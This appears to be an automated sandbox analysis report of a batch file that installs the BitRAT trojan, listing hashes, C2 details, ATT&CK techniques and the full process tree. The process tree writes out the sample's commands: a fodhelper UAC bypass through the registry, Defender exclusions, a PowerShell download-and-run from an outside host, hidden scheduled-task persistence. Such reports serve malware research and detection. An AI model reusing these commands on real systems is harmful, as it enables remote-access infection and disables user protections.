bitrat | 86ea220b5f1a142c4e7442f11d80bae12d158a1427de8b32afa34912685b4ce0

General

Target

XLL-EXCEL-EXPLOIT--main/XLL EXCEL EXPLOIT/packages/info.bat
Size

5KB
MD5

6029bfd4036c00fc9abb4decf00163d7
SHA1

f0483462eb8bce5ba67bb08c420cbea4437dd066
SHA256

a795f07f8bd65437d65ac3431fcd3e45c92f741bb9b4e24183267533a79a0b2f
SHA512

3854c0a6f3552056bd11456843ecc4cd36cfbbf41172278f90df3ac0416a762113d791b348cbedb7b7efff31656ca3abc73e629f5477b2bb61c881287bcccb41
SSDEEP

96:hwB9ZsSwiv/DZL7CCUkltOL3eOlZ8n6P19dHdRgbVwTnHApiDMUV:hqwg/cC9OL3eOlZ99dHdRg+TnHn

Score

10^/10

bitrat evasion trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://asamyz.com/ini.exe

Extracted

Family

bitrat

Version

1.38

C2

wwww.ddnsgeek.com:59599

Attributes

communication_password
32c93a52f919c37c05b22825e5a57a4a
tor_process
tor

Signatures

BitRAT
BitRAT is a remote access tool written in C++ and uses leaked source code from other families.
trojan bitrat

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1088

Disabling Security Tools

T1089

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPRomptBehAvioRAdmin = "0"	reg.exe

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

8 1776 powershell.exe
Downloads MZ/PE file
Executes dropped EXE 2 IoCs

Processes:

svchost.exesvchost.exe

pid process

2280 svchost.exe
2956 svchost.exe
Sets file to hidden 1 TTPs 2 IoCs
Modifies file attributes to stop it showing in Explorer etc.
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exeattrib.exe

pid process

2888 attrib.exe
2408 attrib.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs

Processes:

svchost.exesvchost.exe

pid process

2280 svchost.exe
2280 svchost.exe
2280 svchost.exe
2280 svchost.exe
2280 svchost.exe
2956 svchost.exe
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

1388 schtasks.exe
4252 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

1976 timeout.exe
Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

1820 taskkill.exe

flow	pid	process
8	1776	powershell.exe

pid	process
2280	svchost.exe
2956	svchost.exe

pid	process
2888	attrib.exe
2408	attrib.exe

pid	process
2280	svchost.exe
2280	svchost.exe
2280	svchost.exe
2280	svchost.exe
2280	svchost.exe
2956	svchost.exe

pid	process
1388	schtasks.exe
4252	schtasks.exe

pid	process
1976	timeout.exe

pid	process
1820	taskkill.exe

Modifies registry class 7 IoCs

Processes:

reg.exereg.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\ms-settings\shell\open\commAnd	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\ms-settings\shell\open\commAnd\DelegAteExecute = " "	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\ms-settings\shell\open\commAnd	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\ms-settings	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\ms-settings\shell	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\ms-settings\shell\open	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\ms-settings\shell\open\commAnd\ = "C:\\windows\\SYStem32\\cmd.exe /c REG ADD HKLM\\soFtwARE\\micRosoFt\\windows\\cuRREntveRsion\\policies\\SYStem /v ConsentPRomptBehAvioRAdmin /t REG_DWORD /d 0 /F"	reg.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

3188 reg.exe

pid	process
3188	reg.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

pid	process
5024	powershell.exe
5024	powershell.exe
4200	powershell.exe
4200	powershell.exe
1776	powershell.exe
1776	powershell.exe
1876	powershell.exe
1876	powershell.exe

Suspicious use of AdjustPrivilegeToken 7 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exesvchost.exetaskkill.exesvchost.exe

description	pid	process
Token: SeDebugPrivilege	5024	powershell.exe
Token: SeDebugPrivilege	4200	powershell.exe
Token: SeDebugPrivilege	1776	powershell.exe
Token: SeDebugPrivilege	1876	powershell.exe
Token: SeShutdownPrivilege	2280	svchost.exe
Token: SeDebugPrivilege	1820	taskkill.exe
Token: SeShutdownPrivilege	2956	svchost.exe

Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

svchost.exe

pid process

2280 svchost.exe
2280 svchost.exe

pid	process
2280	svchost.exe
2280	svchost.exe

Suspicious use of WriteProcessMemory 37 IoCs

Processes:

cmd.execmd.exefodhelper.execmd.exepowershell.exepowershell.exe

description	pid	process	target process
PID 4824 wrote to memory of 3408	4824	cmd.exe	cmd.exe
PID 4824 wrote to memory of 3408	4824	cmd.exe	cmd.exe
PID 3408 wrote to memory of 3664	3408	cmd.exe	reg.exe
PID 3408 wrote to memory of 3664	3408	cmd.exe	reg.exe
PID 3408 wrote to memory of 1088	3408	cmd.exe	reg.exe
PID 3408 wrote to memory of 1088	3408	cmd.exe	reg.exe
PID 3408 wrote to memory of 3604	3408	cmd.exe	fodhelper.exe
PID 3408 wrote to memory of 3604	3408	cmd.exe	fodhelper.exe
PID 3604 wrote to memory of 4004	3604	fodhelper.exe	cmd.exe
PID 3604 wrote to memory of 4004	3604	fodhelper.exe	cmd.exe
PID 3408 wrote to memory of 4896	3408	cmd.exe	cacls.exe
PID 3408 wrote to memory of 4896	3408	cmd.exe	cacls.exe
PID 4004 wrote to memory of 3188	4004	cmd.exe	reg.exe
PID 4004 wrote to memory of 3188	4004	cmd.exe	reg.exe
PID 3408 wrote to memory of 5024	3408	cmd.exe	powershell.exe
PID 3408 wrote to memory of 5024	3408	cmd.exe	powershell.exe
PID 3408 wrote to memory of 4200	3408	cmd.exe	powershell.exe
PID 3408 wrote to memory of 4200	3408	cmd.exe	powershell.exe
PID 3408 wrote to memory of 1776	3408	cmd.exe	powershell.exe
PID 3408 wrote to memory of 1776	3408	cmd.exe	powershell.exe
PID 1776 wrote to memory of 2280	1776	powershell.exe	svchost.exe
PID 1776 wrote to memory of 2280	1776	powershell.exe	svchost.exe
PID 1776 wrote to memory of 2280	1776	powershell.exe	svchost.exe
PID 3408 wrote to memory of 1876	3408	cmd.exe	powershell.exe
PID 3408 wrote to memory of 1876	3408	cmd.exe	powershell.exe
PID 1876 wrote to memory of 1388	1876	powershell.exe	schtasks.exe
PID 1876 wrote to memory of 1388	1876	powershell.exe	schtasks.exe
PID 3408 wrote to memory of 4252	3408	cmd.exe	schtasks.exe
PID 3408 wrote to memory of 4252	3408	cmd.exe	schtasks.exe
PID 3408 wrote to memory of 2408	3408	cmd.exe	attrib.exe
PID 3408 wrote to memory of 2408	3408	cmd.exe	attrib.exe
PID 3408 wrote to memory of 2888	3408	cmd.exe	attrib.exe
PID 3408 wrote to memory of 2888	3408	cmd.exe	attrib.exe
PID 3408 wrote to memory of 1976	3408	cmd.exe	timeout.exe
PID 3408 wrote to memory of 1976	3408	cmd.exe	timeout.exe
PID 3408 wrote to memory of 1820	3408	cmd.exe	taskkill.exe
PID 3408 wrote to memory of 1820	3408	cmd.exe	taskkill.exe

Views/modifies file attributes 1 TTPs 2 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exeattrib.exe

pid process

2408 attrib.exe
2888 attrib.exe

pid	process
2408	attrib.exe
2888	attrib.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\XLL-EXCEL-EXPLOIT--main\XLL EXCEL EXPLOIT\packages\info.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:4824

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\XLL-EXCEL-EXPLOIT--main\XLL EXCEL EXPLOIT\packages\info.bat"
2⤵
- Suspicious use of WriteProcessMemory
PID:3408

C:\Windows\system32\reg.exe
REG ADD "HKCU\SOFTWARE\ClAsses\ms-settings\shell\open\commAnd" /t REG_SZ /d "C:\windows\SYStem32\cmd.exe /c REG ADD HKLM\soFtwARE\micRosoFt\windows\cuRREntveRsion\policies\SYStem /v ConsentPRomptBehAvioRAdmin /t REG_DWORD /d 0 /F" /F
3⤵
- Modifies registry class
PID:3664

C:\Windows\system32\reg.exe
REG ADD "hkcu\soFtwARE\clAsses\ms-settings\shell\open\commAnd" /v DelegAteExecute /t REG_SZ /d " " /F
3⤵
- Modifies registry class
PID:1088

C:\Windows\system32\fodhelper.exe
FodhelpeR.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:3604

C:\windows\SYStem32\cmd.exe
"C:\windows\SYStem32\cmd.exe" /c REG ADD HKLM\soFtwARE\micRosoFt\windows\cuRREntveRsion\policies\SYStem /v ConsentPRomptBehAvioRAdmin /t REG_DWORD /d 0 /F
4⤵
- Suspicious use of WriteProcessMemory
PID:4004

C:\Windows\system32\reg.exe
REG ADD HKLM\soFtwARE\micRosoFt\windows\cuRREntveRsion\policies\SYStem /v ConsentPRomptBehAvioRAdmin /t REG_DWORD /d 0 /F
5⤵
- UAC bypass
- Modifies registry key
PID:3188

C:\Windows\SYStem32\cacls.exe
"C:\Windows\SYStem32\cAcls.exe" "C:\Windows\SYStem32\conFig\SYStem"
3⤵
PID:4896

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
poWERshell.exe -c "ADD-MpPREFeREnce -ExclusionExtension ".bat""
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5024

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
poWERshell.exe -c "ADD-MpPREFeREnce -ExclusionExtension ".exe""
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4200

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
poWERshell.exe -c (New-Object System.Net.WebClient).DownloadFile('http://asamyz.com/ini.exe','C:\Users\Admin\profile\svchost.exe');Start-Process 'C:\Users\Admin\profile\svchost.exe'
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1776

C:\Users\Admin\profile\svchost.exe
"C:\Users\Admin\profile\svchost.exe"
4⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2280

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
poWERshell.exe -c "Start-Process -FilePath schtasks -ArgumentList '/Create', '/sc ONLOGON', '/tn profile', '/IT', '/rl HIGHEST', '/TR', \"C:\Users\Admin\profile\svchost.exe\" -verb RunAs"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1876

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Create /sc ONLOGON /tn profile /IT /rl HIGHEST /TR C:\Users\Admin\profile\svchost.exe
4⤵
- Creates scheduled task(s)
PID:1388

C:\Windows\system32\schtasks.exe
schtasks /create /sc minute /mo 2 /tn "spawn" /tr C:\Users\Admin\profile\svchost.exe
3⤵
- Creates scheduled task(s)
PID:4252

C:\Windows\system32\attrib.exe
attrib +S +H C:\Users\Admin\profile
3⤵
- Sets file to hidden
- Views/modifies file attributes
PID:2408

C:\Windows\system32\attrib.exe
attrib +S +H C:\Users\Admin\profile\svchost.exe
3⤵
- Sets file to hidden
- Views/modifies file attributes
PID:2888

C:\Windows\system32\timeout.exe
timeout /T 3
3⤵
- Delays execution with timeout.exe
PID:1976

C:\Windows\system32\taskkill.exe
taskkill /F /IM cmd.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1820

C:\Users\Admin\profile\svchost.exe
C:\Users\Admin\profile\svchost.exe
1⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:2956

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

Hidden Files and Directories

2

T1158

Scheduled Task

1

T1053

Privilege Escalation

Bypass User Account Control

1

T1088

Scheduled Task

1

T1053

Defense Evasion

Bypass User Account Control

1

T1088

Disabling Security Tools

1

T1089

Modify Registry

2

T1112

Hidden Files and Directories

2

T1158

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
6d42b6da621e8df5674e26b799c8e2aa

SHA1
ab3ce1327ea1eeedb987ec823d5e0cb146bafa48

SHA256
5ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c

SHA512
53faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
503988324b8cb7337f1b542007325008

SHA1
e1cb4143117c97d7c251542ed1ab097624132905

SHA256
337cba70319953b4ede67cbd8905a09e43487e32566a96f5ad420ed1bbdca1b2

SHA512
292ff8051dc4a694ff101b587a43102dd2cd0a2829173c6ab7fe89e2fd8fe30999be38f06ee6fe9eb7455da5ad0f0bf8433b6e34da81e42073db84cca22fe750

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
94f2895e3e5302db3d1acc2408d4e670

SHA1
04adfb1f703ac79cabe7a4aee4e65f2f8e670ad8

SHA256
38db37a4883e3ffc461ae39aa89625180368d7dd894800f58501a2ae952682ca

SHA512
b888b3babac968060ef668e79b988724f1767b9406981c0d46c44ab2d5e0fa2f71357b375abd8f85f7013ab64c357553709290f665101db648a456fe8e503d11

Download Submit
C:\Users\Admin\profile\svchost.exe
Filesize
3.8MB

MD5
221e0fa159b0892c04254280d9a46674

SHA1
fbe9558c1bf14a8ec59b918084de51d6f7d9037b

SHA256
8ac53eb721a6ae815a870b81dad63a155c6518e20a84735550ed1f83dd380eb7

SHA512
084f35c331ec3c5a19dde1e5531b82206f2b5c2b0b3d315e72fca824890a4480141448c2fd22f65a00ffcb9de64103fe9e95282906154f6d24857be64a8ef8f9

Download Submit
C:\Users\Admin\profile\svchost.exe
Filesize
3.8MB

MD5
221e0fa159b0892c04254280d9a46674

SHA1
fbe9558c1bf14a8ec59b918084de51d6f7d9037b

SHA256
8ac53eb721a6ae815a870b81dad63a155c6518e20a84735550ed1f83dd380eb7

SHA512
084f35c331ec3c5a19dde1e5531b82206f2b5c2b0b3d315e72fca824890a4480141448c2fd22f65a00ffcb9de64103fe9e95282906154f6d24857be64a8ef8f9

Download Submit
C:\Users\Admin\profile\svchost.exe
Filesize
3.8MB

MD5
221e0fa159b0892c04254280d9a46674

SHA1
fbe9558c1bf14a8ec59b918084de51d6f7d9037b

SHA256
8ac53eb721a6ae815a870b81dad63a155c6518e20a84735550ed1f83dd380eb7

SHA512
084f35c331ec3c5a19dde1e5531b82206f2b5c2b0b3d315e72fca824890a4480141448c2fd22f65a00ffcb9de64103fe9e95282906154f6d24857be64a8ef8f9

Download Submit
memory/1088-134-0x0000000000000000-mapping.dmp

Download
memory/1388-159-0x0000000000000000-mapping.dmp

Download
memory/1776-153-0x00007FF970890000-0x00007FF971351000-memory.dmp

Filesize
10.8MB

Download
memory/1776-150-0x00007FF970890000-0x00007FF971351000-memory.dmp

Filesize
10.8MB

Download
memory/1776-148-0x0000000000000000-mapping.dmp

Download
memory/1820-167-0x0000000000000000-mapping.dmp

Download
memory/1876-158-0x00007FF970890000-0x00007FF971351000-memory.dmp

Filesize
10.8MB

Download
memory/1876-160-0x00007FF970890000-0x00007FF971351000-memory.dmp

Filesize
10.8MB

Download
memory/1876-154-0x0000000000000000-mapping.dmp

Download
memory/1976-164-0x0000000000000000-mapping.dmp

Download
memory/2280-156-0x0000000000400000-0x00000000007CE000-memory.dmp

Filesize
3.8MB

Download
memory/2280-165-0x00000000746A0000-0x00000000746D9000-memory.dmp

Filesize
228KB

Download
memory/2280-166-0x0000000074A20000-0x0000000074A59000-memory.dmp

Filesize
228KB

Download
memory/2280-151-0x0000000000000000-mapping.dmp

Download
memory/2280-170-0x00000000746A0000-0x00000000746D9000-memory.dmp

Filesize
228KB

Download
memory/2280-171-0x0000000074A20000-0x0000000074A59000-memory.dmp

Filesize
228KB

Download
memory/2408-162-0x0000000000000000-mapping.dmp

Download
memory/2888-163-0x0000000000000000-mapping.dmp

Download
memory/2956-169-0x0000000000400000-0x00000000007CE000-memory.dmp

Filesize
3.8MB

Download
memory/3188-138-0x0000000000000000-mapping.dmp

Download
memory/3408-132-0x0000000000000000-mapping.dmp

Download
memory/3604-135-0x0000000000000000-mapping.dmp

Download
memory/3664-133-0x0000000000000000-mapping.dmp

Download
memory/4004-136-0x0000000000000000-mapping.dmp

Download
memory/4200-145-0x00007FF970890000-0x00007FF971351000-memory.dmp

Filesize
10.8MB

Download
memory/4200-143-0x0000000000000000-mapping.dmp

Download
memory/4200-147-0x00007FF970890000-0x00007FF971351000-memory.dmp

Filesize
10.8MB

Download
memory/4252-161-0x0000000000000000-mapping.dmp

Download
memory/4896-137-0x0000000000000000-mapping.dmp

Download
memory/5024-141-0x00007FF970890000-0x00007FF971351000-memory.dmp

Filesize
10.8MB

Download
memory/5024-139-0x0000000000000000-mapping.dmp

Download
memory/5024-140-0x0000023743B50000-0x0000023743B72000-memory.dmp

Filesize
136KB

Download
memory/5024-142-0x00007FF970890000-0x00007FF971351000-memory.dmp

Filesize
10.8MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads